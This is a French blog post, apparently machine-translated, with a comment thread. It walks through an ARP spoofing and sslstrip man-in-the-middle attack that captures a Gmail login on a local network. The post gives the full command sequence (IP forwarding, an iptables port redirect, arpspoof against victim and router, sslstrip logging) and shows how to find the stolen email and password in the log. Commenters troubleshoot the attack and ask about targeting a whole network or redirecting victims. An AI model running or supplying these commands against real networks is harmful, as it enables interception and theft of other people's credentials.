ArpSpoofing et SSlstrip en action.

Bonjour les blogueurs.

Pour aujourd'hui, j'ai un petit échantillon de la dangerosité d'être connecté à n'importe quel réseau sans la sécurité de ceux que beaucoup d'entre nous aiment.

Pour aujourd'hui, je vais utiliser ArpSpoofing avec Sslstrip pour obtenir un mot de passe Gmail. Pour rendre l'environnement plus contrôlé, j'ai créé un compte appelé "testarp@gmail.com ».

Et comme je n'aime pas beaucoup les préambules, passons aux choses sérieuses.

Je ne suis à aucun moment responsable de ce qu'ils peuvent faire avec les informations suivantes. Je le fais exclusivement à des fins éducatives

ENVIRONNEMENT

Pour ce test, ce que nous avons est le suivant:

1. Attaquant: C'est mon ordinateur de bureau ou de bureau qui a Debian Wheezy. À partir de référentiels, vous pouvez installer bande SSL y renifler arriver à avoir usurpation d'identité

2. Victime: La victime est une tablette Android qui ne souhaite voir son courrier que via le navigateur.

3. Le support: Le milieu est mon Routeur Cisco DPC2425

ADRESSES.

Adresse de l'attaquant: 172.26.0.2

Adresse du routeur: 172.26.0.1

Adresse de la victime: 172.26.0.8

L'ATTAQUE:

Pour comprendre un peu plus comment fonctionne l'attaque, vous pouvez aller à mon ancien POSTEZ

La première chose que nous ferons pour cette attaque est d'activer l'avant afin que notre ordinateur puisse transmettre l'information à la victime sans qu'elle s'en rende compte. (Sinon, ce serait une attaque par déni de services)

Pour cela, nous utiliserons:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Chaque commande dans une fenêtre de console directe.

Maintenant, si nous faisons tail -f desdelinux nous voyons les informations en direct et directement

instantané1

Alors, comment pouvons-nous obtenir ce que nous voulons?

Entrons d'abord notre courrier sur la tablette. En nous connectant, nous voyons que des milliers et des milliers de choses apparaissent sur notre console.

Maintenant que c'est fini ouvrons notre dossier "desdelinux" avec nano

nano desdelinux

avec Control + W, nous recherchons quelque chose appelé POST SECURISE.

Et nous verrons quelque chose comme ça.

instantané2

L'e-mail et le mot de passe de la victime figurent parmi cette énorme ligne invisible.

Nous courons donc vers la droite jusqu'à ce que nous voyions enfin la lumière au bout du tunnel.

instantané3

À une autre occasion, nous verrons comment nous pouvons nous protéger un peu de ces attaques.

salutations


Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont marqués avec *

*

*

  1. Responsable des données: Miguel Ángel Gatón
  2. Finalité des données: Contrôle du SPAM, gestion des commentaires.
  3. Légitimation: votre consentement
  4. Communication des données: Les données ne seront pas communiquées à des tiers sauf obligation légale.
  5. Stockage des données: base de données hébergée par Occentus Networks (EU)
  6. Droits: à tout moment, vous pouvez limiter, récupérer et supprimer vos informations.

  1.   @Jlcmux dit

    Je profite de cette occasion pour dire que lorsque l'article a été publié, les commandes n'étaient pas correctes.

    La commande iptables à la fin manque le 8080 qui se trouve sur une autre ligne. Et puis les commandes arpspoof étaient toutes sur la même ligne. Chaque commande étant sur une ligne différente.

    J'espère que l'éditeur le verra et pourra le réparer.

    Salutations.

    1.    Manuel de la source dit

      J'ai apporté les corrections que vous mentionnez, est-ce que ça va?

      Si vous allez insérer du code dans une entrée préférée, utilisez la vue HTML et vérifiez que l'article est correct avant de l'envoyer en attente. Je vous remercie.

  2.   Luis dit

    Il est effrayant de savoir que ceux d’entre nous qui n’ont pas de connaissances sont si vulnérables. Très bonne information même quand je comprends peu le sujet je me rends compte de l'importance. Je vous remercie!
    salutations

  3.   giskard dit

    Mais cela ne fonctionne que si l'attaquant et la victime sont sur le même réseau. Dans tous les cas, il me semble que si (étant sur le même réseau) vous vous connectez en HTTPS cela ne se produit pas car les données sont cryptées AVANT de quitter votre machine. Si vous vous connectez par HTTP (sans S), je pense que même en regardant le câble réseau, vous voyez les clés.

    1.    @Jlcmux dit

      Ce n'est pas vrai. Je pirate un mot de passe gmail et si vous remarquez que gmail utilise https. Ensuite? Le fait est que bien que https soit sécurisé, cela dépend de http. Ce n'est donc pas si sûr.

      N'avoue pas tant sur un https que le S n'est pas pour Superman c'est pour "safe"

    2.    Rten dit

      cela fonctionne avec ou sans https, je l'ai essayé avec une distribution linux plus spécialisée et cela fonctionne sans problème

    3.    Manuel de la source dit

      Vous pouvez précisément l'utiliser pour donner une leçon à ceux qui volent votre Wi-Fi. 😀

      C'est plus ou moins ce qu'ils disaient il y a longtemps sur le blog de Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonnant dit

        Ostie, super ce que ça fait! / Et puis ils disent ma paranoïaque à chaque fois que j'utilise le VPN quand ils vont vérifier le compte bancaire…). Soit dit en passant, il faut voir à quel point les gens sont cyniques dans les commentaires ... si à la fin c'est du vol ...

        1.    éliotime3000 dit

          Nous devons maintenant suivre un tutoriel sur la création et l'offre de votre propre service VPN.

      2.    Daniel dit

        L'histoire que vous liez est très intéressante, elle semble même digne d'un roman, et cela me rappelle quand j'ai utilisé l'internet de mes voisins et bien que je dis que je connais le sujet, je pense que je ne pourrais jamais voir les vraies dimensions du danger que je pourrais avoir enfin, heureusement pour moi, ils ont seulement changé le mot de passe en WPA2 et c'est là que mon histoire avec le FAI a commencé haha

    4.    Ile Maurice dit

      C'est pourquoi le titre dit Sslstrip en action.

      Cela fonctionne, tant que l'attaquant est au milieu

  4.   anon dit

    Quelle vague travaillez-vous chez prism? -.-
    no.
    Qu'attendez-vous pour envoyer votre demande XD
    salutations
    bon post

  5.   auroszx dit

    Intéressant, je ferai un test pédagogique plus tard ... Peut-être que je pourrais même supprimer le mot de passe du WiFi et m'amuser un peu 😛
    Par hasard, pouvez-vous faire quelque chose de similaire pour envoyer des pages différentes à celles demandées par la cible? Par exemple, ils veulent ouvrir Facebook et je les redirige vers Google? 😛

    1.    @Jlcmux dit

      Oui. Mais c'est un rôle très différent.

      Peut-être que je le posterai plus tard.

  6.   derniernouveau dit

    très bon post, ces sujets sont très pédagogiques, il faut maintenant pouvoir contrer cette attaque, puisque certains (comme moi) se connectent à des réseaux publics (l'université par exemple) il serait utile de l'éviter.

    Salutations!

  7.   juste-un-autre-utilisateur-dl dit

    Cela n'a pas fonctionné pour moi 🙁

  8.   Wow dit

    Quelque chose me manque ici, à part le fait que les connexions https sont cryptées via un certificat serveur (une fois que vous avez le certificat sur votre machine, votre navigateur se charge du cryptage) avec iptables vous redirigez le port 80 (http) , pas 443, qui est https

    1.    @Jlcmux dit

      Je pensais ça aussi. Le fait est que bien que https soit "sécurisé", il dépend malheureusement de http. Donc, sslstrip en profite, il fait croire au navigateur qu'il utilise des informations d'identification https, mais ce n'est pas le cas.

      1.    Wow dit

        merde! mais le navigateur devrait voir un avertissement comme "ce certificat provient d'un site suspect ou quelque chose comme ça" ... Je vais certainement devoir faire des tests XD

        1.    @Jlcmux dit

          Non, absolument rien ne sort.

  9.   juste-un-autre-utilisateur-dl dit

    Cela a finalement fonctionné pour moi
    Je suis connecté sur un réseau WEP avec mot de passe, et il m'a montré le mot de passe directement de toute façon.

    Une consultation. Pouvez-vous faire cette même procédure mais pour tous les ordinateurs connectés au réseau, au lieu d'avoir une seule victime?

    1.    @Jlcmux dit

      Si on peut. Mais je n'ai pas fait d'expériences. Essayez-le vous-même et dites-nous comment vous allez.

  10.   sinnick19 dit

    La seule chose que j'obtiens avec ceci est que la machine de la victime se déconnecte, mais le sslstrip ne me montre rien: /

    1.    @Jlcmux dit

      Vous devez désactiver le pare-feu pendant un moment. Ou au moins activer les connexions entrantes.

  11.   Mr Black dit

    Probe et je n'ai pu voir que le nom d'utilisateur et le mot de passe de la page facebook, dans gmail je n'ai trouvé aucun résultat dans le journal, aussi j'avais seulement besoin d'une ligne d'arpspoof «arpspoof -i -t«. En revanche, la machine victime n'a pas pu ouvrir certaines pages. Je vais continuer à enquêter, c'est très intéressant. Une aide pour ceux qui utilisent Manjaro, les packages à installer sont: dsniff (voici arpspoff), twisted et python2-pyopenssl. Sslstrip peut être téléchargé à partir d'ici: http://www.thoughtcrime.org/software/sslstrip/
    Pour l'exécuter $ python2 sslstrip.py
    Salutations.

  12.   Mr Black dit

    Il n'est pas sorti mais la ligne arpspoof est: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert dit

    regarde je fais exactement ce que tu dis:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –vers-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Le problème est que la victime, qui est un autre pc que j'ai ici dans ma chambre, est laissée sans connexion au point que je dois redémarrer le routeur, que puis-je faire, m'aider.

    Une autre chose que je travaille avec une machine virtuelle, et lorsque j'exécute la commande iwconfig, wlan0 n'apparaît pas, ni lorsque j'exécute ifconfig, mais si j'ai Internet sur ma machine virtuelle, quoi avec une interface eth0.